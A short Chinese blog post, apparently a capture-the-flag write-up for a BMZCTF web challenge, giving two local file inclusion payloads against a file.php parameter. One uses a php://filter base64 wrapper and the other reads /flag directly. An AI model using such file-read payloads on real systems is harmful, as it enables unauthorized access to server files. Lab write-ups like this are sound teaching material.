bmzctf 刷题记录 zonghe

bmzctf 刷题记录 zonghe

2Ttlgf.png
PS:终于不是开局一坨代码了🎉️
PS:这道题有两种解法。。。。第二种应该是非预期

解法一 (文件读取+伪协议)

点击登录,注意传参

2TtJbQ.png

file=文件读取

payload:

file.php?file=php://filter/convert.base64-encode/resource=/flag

一发入魂,不解释

解法二

payload:

file.php?file=/flag

2Tt25R.png

无语,就tmd无语
说着是综合,结果就这

今年的强网杯打的真伤😔
还是自己太菜了

posted @ 2021-06-14 03:24  MuRKuo  阅读(60)  评论(0)    收藏  举报